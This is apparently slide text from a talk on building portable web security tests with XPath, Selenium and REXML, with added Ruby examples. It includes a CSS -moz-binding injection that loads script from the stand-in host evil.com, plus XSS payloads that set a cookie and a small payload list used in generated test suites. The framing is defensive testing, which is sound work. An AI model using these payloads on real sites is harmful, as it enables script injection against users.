Path X

Explosive Security Testing Tools with XPath
Interesting questions
-Technique improvements
-Error handling
-Knowing when to stop
Introduction to vulnerability theory
-Researcher instinct
Real vulnerability in Google
-Not on the top level domain
-CSS consumed and then run
-Reflected XSS through CSS
<table><tr><td>Google text</td></tr></table>

<!DOCTYPE ...>
<html>
<head>
<link rel="stylesheet">

• Interaction
• Crossover
• Trigger
• (Activation)

tr:first-child td { -moz-binding: url("http://evil.com/xss.js"); }

(-moz-binding attaches an XBL binding in Firefox; once the injected stylesheet rule matches the first table row, the binding's script executes. Interaction is the attacker-controlled stylesheet reaching the page, crossover is the browser treating it as CSS, the trigger is the rule matching, and activation is the binding running.)
OWASP
WASC
NIST
DHS BSI, Cigital
Source code in tools
Movement away from ad-hoc methods
Cowboy coders
What is missing?
-Specialized language
-A clear entry path
-Peer review
-Standards, practices, & procedures
Marcin Wielgoszewski
Andre Gironda

tssci-security.com
(ts/sci: trusted systems, TCSEC)
Richness of the user experience
Goal                     CSS3        XPath
All <p> elements         p           //p
All child elements       p>*         //p/*
Element by ID            #foo        //*[@id='foo']
Element by class         .foo        //*[contains(@class,'foo')]
Element with attribute   *[title]    //*[@title]
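Added example (not from the slides) that runs every row of the table above with REXML, one of the parser libraries named later in the deck. The sample page is constructed here and is not the Google markup. It also shows the one row that is not an exact equivalent: contains(@class,'foo') is a substring test, so it matches class="foobar" as well, while CSS .foo is a whitespace-separated token test; xpath_select_class_token does the token check so the two agree.

```ruby
require 'rexml/document'
require 'rexml/xpath'

# Constructed sample page (not from the slides) that exercises every row of
# the CSS3 / XPath table above, including a class="foobar" decoy.
SAMPLE_XHTML = <<~XHTML
  <html>
    <body>
      <p id="foo" class="intro">first <b>bold</b></p>
      <p class="foo">second</p>
      <p class="foobar">looks like .foo but is not</p>
      <div class="note foo"><span title="hint">child</span></div>
      <img title="logo"/>
    </body>
  </html>
XHTML

# The table's CSS3 selectors and the XPath the slide pairs with each.
CSS_TO_XPATH = {
  'p'        => '//p',
  'p>*'      => '//p/*',
  '#foo'     => "//*[@id='foo']",
  '.foo'     => "//*[contains(@class,'foo')]",
  '*[title]' => '//*[@title]',
}.freeze

# Short label for a matched element: name plus #id and .class when present.
def element_label(el)
  s = el.name.dup
  s << "##{el.attributes['id']}" if el.attributes['id']
  s << ".#{el.attributes['class']}" if el.attributes['class']
  s
end

# Evaluate an XPath against an XHTML string; returns labels in document order.
def xpath_select(xhtml, xpath)
  doc = REXML::Document.new(xhtml)
  REXML::XPath.match(doc, xpath).map { |el| element_label(el) }
end

# Exact equivalent of CSS .token: the class attribute is split on whitespace
# and one of the tokens must equal the name, so "foobar" no longer matches.
def xpath_select_class_token(xhtml, token)
  doc = REXML::Document.new(xhtml)
  REXML::XPath.match(doc, '//*[@class]')
              .select { |el| el.attributes['class'].split.include?(token) }
              .map { |el| element_label(el) }
end

if __FILE__ == $PROGRAM_NAME
  CSS_TO_XPATH.each do |css, xp|
    puts format('%-9s %-32s => %p', css, xp, xpath_select(SAMPLE_XHTML, xp))
  end
  puts format('%-9s %-32s => %p', '.foo', '(token match)',
              xpath_select_class_token(SAMPLE_XHTML, 'foo'))
end
```

Running it prints three matches for the contains() form (p.foo, p.foobar, div.note foo) and two for the token match; when a test locator must be exact, use the token form or match on an id instead.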
If you're using regular expressions against a web application, you're barking up the wrong tree

XPath is like a filesystem

Parser libs: LibXML2, REXML, XOM
xmllint --shell help (libxml2):

base              display XML base of the node
setbase URI       change the XML base of the node
bye               leave shell
cat [node]        display node or current node
cd [path]         change directory to path or to root
dir [path]        dumps information about the node (namespace, attributes, content)
du [path]         show the structure of the subtree under path or the current node
exit              leave shell
help              display this help
free              display memory usage
load [name]       load a new document with name
ls [path]         list contents of path or the current directory
set xml_fragment  replace the current node content with the fragment parsed in context
xpath expr        evaluate the XPath expression in that context and print the result
setns nsreg       register a namespace to a prefix in the XPath evaluation context
                  format for nsreg is: prefix=[nsuri] (i.e. prefix= unsets a prefix)
setrootns         register all namespaces found on the root element
                  the default namespace if any uses 'defaultns' prefix
pwd               display current working directory
quit              leave shell
save [name]       save this document to name or the original name
write [name]      write the current node to the filename
validate          check the document for errors
relaxng rng       validate the document against the Relax-NG schemas
grep string       search for a string in the subtree

/ > cd //input[@type='submit'][1]
input > pwd
/html/body/center/form/table/tr/td[2]/input[3]
input > cat
<input name="btnG" type="submit" value="Google Search">
You've used grep, right?
X/HTML isn't greppable
Tree, push and pull parsers
-DOM (XPath), SAX
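The xmllint session above (cd, pwd, cat) is the filesystem view of a document in one shell; the added example below does the same thing in Ruby with REXML so it can sit inside a test. It is not code from the slides, and the page it parses is a constructed stand-in for the Google front page, shaped so that the first submit button lands at the same path the slide shows. cd_pwd_cat resolves a loose query to the first matching element and returns its absolute, index-qualified path (pwd) and serialization (cat); locator_roundtrips? checks that the pwd path is a stable locator that selects the same node again.

```ruby
require 'rexml/document'
require 'rexml/xpath'

# Constructed stand-in for the Google front page in the shell session above
# (not the real markup): one form, two cells, four inputs, so the first
# submit button is td[2]/input[3] just as xmllint's pwd printed.
FRONT_PAGE = <<~XHTML
  <html>
    <body>
      <center>
        <form action="/search">
          <table>
            <tr>
              <td>Advanced Search</td>
              <td>
                <input name="hl" type="hidden" value="en"/>
                <input name="q" type="text" size="55"/>
                <input name="btnG" type="submit" value="Google Search"/>
                <input name="btnI" type="submit" value="I'm Feeling Lucky"/>
              </td>
            </tr>
          </table>
        </form>
      </center>
    </body>
  </html>
XHTML

# "cd <xpath>; pwd; cat" as a function: the first element matched by the
# query, its absolute XPath (REXML::Element#xpath adds [n] only where siblings
# share a name, like xmllint) and its serialization. nil when nothing matches.
def cd_pwd_cat(xhtml, xpath)
  doc = REXML::Document.new(xhtml)
  node = REXML::XPath.first(doc, xpath)
  return nil unless node.is_a?(REXML::Element)
  { pwd: node.xpath, cat: node.to_s }
end

# A pwd path is only useful as a test locator if it selects the same element
# again on a fresh parse; this proves it for the given query.
def locator_roundtrips?(xhtml, xpath)
  hit = cd_pwd_cat(xhtml, xpath)
  return false unless hit
  again = REXML::XPath.first(REXML::Document.new(xhtml), hit[:pwd])
  again.is_a?(REXML::Element) && again.to_s == hit[:cat]
end

if __FILE__ == $PROGRAM_NAME
  query = "//input[@type='submit'][1]"
  hit = cd_pwd_cat(FRONT_PAGE, query)
  puts "pwd: #{hit[:pwd]}"
  puts "cat: #{hit[:cat]}"
  puts "round-trips: #{locator_roundtrips?(FRONT_PAGE, query)}"
end
```

The absolute path is brittle (any new sibling shifts the index), which is why the Selenium tests later in the deck locate by attribute, //input[@name='chat'], rather than by position.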
Not fun

HTML Tidy and XML Untidy
Tidy bindings, or BeautifulSoup / RubyfulSoup
NekoHTML and TagSoup in Java
Browsers already handle it
-Both good and bad...
Protocol Drivers
-cURL, twill
Application Drivers
-HtmlUnit, jWebUnit, WebDriver
Browser Drivers
-Watir, Selenium, WebDriver




Firebug, XPather, View Source Chart
+XPath Checker, Selenium IDE

Use the XPath extensions to get the locations of HTML elements

Start building tests in Selenium IDE
[Screenshots: awesome.html ("Awesome AJAX Application - Please, enter your nick and press chat!"), opened from file:///home/marcin/research/shmoocon/new/awesome.html, inspected with Firebug, XPather, XPath Checker and DOM Inspector]

Firebug, HTML tab (right-click > Copy XPath on the Chat button):
  <body>
    <div id="header">...</div>
    <div id="content">
      <div>
        <p>...</p>
        <input type="text" size="50" name="name"/>
        <br/>
        <input type="button" value="Chat" name="chat"/>
      </div>
      ...
    </div>
    <div id="footer">...</div>
  </body>

XPather:        /html/body/div[@id='content']/div/input[2]   (Matching Nodes: 1 from 1)
XPath Checker:  id('content')/div/input[2]   (namespace http://www.w3.org/1999/xhtml; one match)
DOM Inspector:  /html/body/div[@id='content']/div/input[2]   -> INPUT, type "button", value "Chat"
Record and playback your actions
Put Firefox in autopilot mode
Tests are saved in an HTML table
Extend tests built in the IDE and string 
them together to create test suites 

-Add actions and assertions for a 
comprehensive test 

Run Selenium tests from any browser 
Exploit the DOM via XSS

Example taken from the book XSS Attacks: awesome.html by pdp

The test
-Bypass input validation
-Set a cookie (DOM XSS)
-Verify the cookie exists
-Delete the cookie
[Screenshots: Selenium TestRunner (file:///home/marcin/research/shmoocon/new/selenium/core/TestRunner.html?test=..., truncated in the screenshot) stepping through the suite against awesome.html, with Firebug's console open]

XSS Attack Test Suite
Test for XSS Attacks

Set a cookie in the DOM
open          file:///home/marcin/research/shmoocon/new/awesome.html
deleteCookie  name                    /
type          name                    <script>document.cookie='name=xss; expires=Thu, 2 Aug 2010 20:47:11 UTC; path=/';</script>
click         //input[@name='chat']
verifyCookie  name=xss
deleteCookie  name                    /

Sequence seen in the screenshots:
-Before the click the page still shows "Please, enter your nick and press chat!" and document.cookie in the Firebug console is empty
-After the click the page shows "Welcome! You can type your message into the form below." followed by the reflected payload, and document.cookie returns "name=xss"
-The final deleteCookie empties it again; TestRunner reports 1 run, 1 passed (elapsed 01:21)
Write tests in HTML tables

Just a taste of what you can test for
-Test for illegal characters
-Input validation
-No XSS or SQL injection cheat sheet necessary
Take Selenium test suites and use them throughout the Secure SDLC

Run tests at compilation and during the integration phase
-Ant build tasks, etc.
package com.example.tests;

import com.thoughtworks.selenium.*;
import java.util.regex.Pattern;

public class NewTest extends SeleneseTestCase {
    public void testNew() throws Exception {
        selenium.open("/awesome.html");
        selenium.deleteCookie("name", "/");
        // The payload goes into the nick field; awesome.html reflects it into the DOM unescaped
        selenium.type("name", "<script>document.cookie='name=xss; expires=Thu, 2 Aug 2010 20:47:11 UTC; path=/';</script>");
        selenium.click("//input[@name='chat']");
        // If the injected script ran, the cookie it set is now visible to the browser
        verifyEquals("name=xss", selenium.getCookie());
        selenium.deleteCookie("name", "/");
    }
}
Don't use Java? There's C#, Perl, PHP, Python and Ruby too!

Tests are made portable with XPath
Selenium or WebDriver

Think of other places in the lifecycle
-Inspection with PMD
-Web application security scanner for operations / maintenance testing
-Other places?
Selenium examples were table-driven
-Can also be script-driven
-Data-driven
-Capture/Replay
100% automation is better
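Added example (not from the slides, not Selenium's own code) of the data-driven variant: the same six Selenese steps used against awesome.html above, generated once per payload as a Selenium IDE test-case table, plus the suite table that strings the cases together. The payload list and file names are constructed here; the locators are the XPath ones from the deck, which is what keeps the generated tests portable across the IDE, the RC client libraries and WebDriver. Cells are HTML-escaped so a <script> payload is stored as data in the table rather than being parsed as markup when the IDE loads it.

```ruby
require 'cgi'

# Constructed payload list (not the slides'): each entry becomes one test case.
XSS_PAYLOADS = [
  "<script>document.cookie='name=xss; path=/';</script>",
  "<img src=x onerror=\"document.cookie='name=xss; path=/'\">",
  "\"><svg onload=\"document.cookie='name=xss; path=/'\">",
].freeze

# The six Selenese steps from the deck as [command, target, value] rows.
def xss_cookie_commands(url, field_locator, submit_locator, payload)
  [
    ['open',         url,            ''],
    ['deleteCookie', 'name',         '/'],
    ['type',         field_locator,  payload],
    ['click',        submit_locator, ''],
    ['verifyCookie', 'name=xss',     ''],
    ['deleteCookie', 'name',         '/'],
  ]
end

# Selenium IDE test-case format: an HTML table whose header row is the title
# and whose body rows are command / target / value. Every cell is escaped.
def selenese_table(title, commands)
  rows = commands.map do |cmd, target, value|
    cells = [cmd, target, value].map { |c| "<td>#{CGI.escapeHTML(c)}</td>" }
    "<tr>#{cells.join}</tr>"
  end
  <<~HTML
    <html><head><title>#{CGI.escapeHTML(title)}</title></head><body>
    <table cellpadding="1" cellspacing="1" border="1">
    <thead><tr><td rowspan="1" colspan="3">#{CGI.escapeHTML(title)}</td></tr></thead>
    <tbody>
    #{rows.join("\n")}
    </tbody></table></body></html>
  HTML
end

# One test case per payload plus the suite table (Selenium IDE's suite format
# is a one-column table of links to the case files). Returns file name => HTML.
def build_suite(url, field_locator, submit_locator, payloads)
  files = {}
  payloads.each_with_index do |payload, i|
    name = "xss_#{i + 1}"
    files["#{name}.html"] =
      selenese_table(name, xss_cookie_commands(url, field_locator, submit_locator, payload))
  end
  links = files.keys.map do |f|
    "<tr><td><a href=\"#{f}\">#{File.basename(f, '.html')}</a></td></tr>"
  end
  files['suite.html'] = <<~HTML
    <table id="suiteTable" cellpadding="1" cellspacing="1" border="1" class="selenium">
    <tbody><tr><td><b>XSS Attack Test Suite</b></td></tr>
    #{links.join("\n")}
    </tbody></table>
  HTML
  files
end

if __FILE__ == $PROGRAM_NAME
  suite = build_suite('/awesome.html', "//input[@name='name']",
                      "//input[@name='chat']", XSS_PAYLOADS)
  suite.each { |name, html| puts "== #{name}\n#{html}" }
end
```

Write the returned hash to disk next to TestRunner.html and open suite.html in the runner; adding a payload means adding one string to the list, not recording another session.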
Quality testers used script-driven tests
-With TCL
-Some Perl
-Others Python
NIST Expect
-autoexpect
AutoRuby?
WebTest
Popular open-source webapp test tool
Extension to Ant
Write tests in XML
Use any / all; mix and match
Domain-specific language
-Specialized languages
XPath as a specialized language
-Use between tools
Fit in different parts of the lifecycle
Watch & Listen
-Think-aloud protocol

Record

Script / data-driven / table

Exploratory testing

Measure test cases, test charters, and testers
Exploiting Online Games: combinatorics
-Induce lag (WoW dupe)
-Spell interactions
Pairwise
-Orthogonal arrays
-All-pairs tables with tester's choice
Increases coverage of tests
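Added example (not from the slides) of the all-pairs idea: a greedy generator that picks, from the full Cartesian product of test factors, the smallest set it can find in which every value of every factor appears together with every value of every other factor. The factor table is constructed here for input-validation testing and is an assumption, not the deck's; an orthogonal array can be smaller than what the greedy pass finds, but the pass already cuts 18 combinations to about half while keeping every pair.

```ruby
require 'set'

# Constructed factor table (not from the slides): where an injection payload
# lands, how it is encoded, and which form field receives it.
FACTORS = {
  vector:   %w[query_string post_body cookie],
  encoding: %w[raw url_encoded html_entity],
  field:    %w[name message],
}.freeze

# Every (factor, value) x (factor, value) combination an all-pairs set must cover.
def required_pairs(factors)
  pairs = Set.new
  factors.keys.combination(2) do |a, b|
    factors[a].each { |va| factors[b].each { |vb| pairs << [a, va, b, vb] } }
  end
  pairs
end

# The pairs a single test (factor => value) covers.
def pairs_in(test)
  test.keys.combination(2).map { |a, b| [a, test[a], b, test[b]] }.to_set
end

# Greedy all-pairs: candidates are the full product; repeatedly take the one
# covering the most still-uncovered pairs until nothing is left uncovered.
def all_pairs(factors)
  names = factors.keys
  values = factors.values
  candidates = values.first.product(*values.drop(1)).map { |row| names.zip(row).to_h }
  uncovered = required_pairs(factors)
  chosen = []
  until uncovered.empty?
    best = candidates.max_by { |t| (pairs_in(t) & uncovered).size }
    chosen << best
    uncovered -= pairs_in(best)
  end
  chosen
end

# Independent check that a test set really covers every required pair.
def covers_all_pairs?(tests, factors)
  covered = tests.map { |t| pairs_in(t) }.inject(Set.new, :|)
  required_pairs(factors).subset?(covered)
end

if __FILE__ == $PROGRAM_NAME
  tests = all_pairs(FACTORS)
  full = FACTORS.values.map(&:size).inject(:*)
  puts "#{tests.size} tests instead of #{full}, all pairs covered: #{covers_all_pairs?(tests, FACTORS)}"
  tests.each { |t| puts t.values.join(' / ') }
end
```

"Tester's choice" fits in here too: seed chosen with the cases you insist on (a known-bad payload in the cookie vector, say) before the loop, and the greedy pass fills in only the pairs those seeds leave uncovered.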
Operations testing
-Fuzzers with code coverage
-Web application security scanners
-Fuzz before purchase
Acceptance testing
-Selenium approach
-DevInspect, AppScan DE, others
-Fuzz before release
Integration testing
-Simultaneous with build (WebTest)

Component testing?
-Apache Cactus, Jetty (Selenium Server), TESTARE, MonoRails

Limitations in unit testing
-Input validation and special chars
Security testing in every phase

Ability to generate functional test code from operations/acceptance tools

XPath decreases the complexity of information exchange